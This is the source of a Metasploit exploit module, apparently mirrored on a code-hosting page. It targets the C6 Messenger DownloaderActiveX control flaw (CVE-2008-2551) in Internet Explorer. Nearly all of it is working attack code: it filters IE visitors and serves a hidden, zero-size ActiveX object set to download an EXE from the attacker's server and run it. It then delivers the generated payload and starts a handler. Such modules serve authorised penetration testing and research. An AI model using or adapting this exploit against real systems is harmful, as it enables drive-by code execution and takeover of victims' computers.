Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
Views: 11783
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpServer::HTML9include Msf::Exploit::EXE1011def initialize(info = {})12super(update_info(info,13'Name' => 'Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute',14'Description' => %q{15This module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The16vulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). The17insecure control can be abused to download and execute arbitrary files in the context of18the currently logged-on user.19},20'License' => MSF_LICENSE,21'Author' =>22[23'Unknown', # Nine:Situations:Group::SnoopyAssault, vulnerability discovery and exploit24'juan vazquez' # metasploit module25],26'References' =>27[28[ 'CVE', '2008-2551' ],29[ 'OSVDB', '45960' ],30[ 'BID', '29519' ]31],32'DefaultOptions' =>33{34'EXITFUNC' => "none",35'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'36},37'Payload' =>38{39'Space' => 2048,40'StackAdjustment' => -3500,41},42'Platform' => 'win',43'Targets' =>44[45[ 'Automatic', { } ],46],47'DisclosureDate' => '2008-06-03',48'DefaultTarget' => 0,49'Privileged' => false))50end5152def autofilter53false54end5556def check_dependencies57use_zlib58end5960def on_request_uri(cli, request)6162# Only IEs are potential targets63# "File Session" is used when the ActiveX tries to request the EXE64agent = request.headers['User-Agent']65if agent !~ /MSIE \d\.\d|File Session/66print_error("Target not supported: #{agent}")67return68end6970payload_url = "http://"71payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']72payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/#{@payload_rand}"7374if (request.uri.match(/#{@payload_rand}/))75return if ((p = regenerate_payload(cli)) == nil)76data = generate_payload_exe({ :code => p.encoded })77print_status("Sending EXE payload")78send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })79return80end8182exe = rand_text_alpha(rand(5) + 1 )8384content = %Q|85<html>86<object id="DownloaderActiveX1" width="0" height="0" classid="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" codebase="DownloaderActiveX.cab#Version=1,0,0,1">87<param name="propProgressBackground" value="#bccee8">88<param name="propTextBackground" value="#f7f8fc">89<param name="propBarColor" value="#df0203">90<param name="propTextColor" value="#000000">91<param name="propWidth" value="0">92<param name="propHeight" value="0">93<param name="propDownloadUrl" value="#{payload_url}/#{exe}.exe">94<param name="propPostDownloadAction" value="run">95<param name="propInstallCompleteUrl" value="">96<param name="propBrowserRedirectUrl" value="">97<param name="propVerbose" value="0">98<param name="propInterrupt" value="0">99</OBJECT>100</html>101|102103print_status("Sending #{self.name}")104105send_response_html(cli, content)106107handler(cli)108109end110111def exploit112@payload_rand = rand_text_alpha(rand(5) + 5 )113super114end115end116117118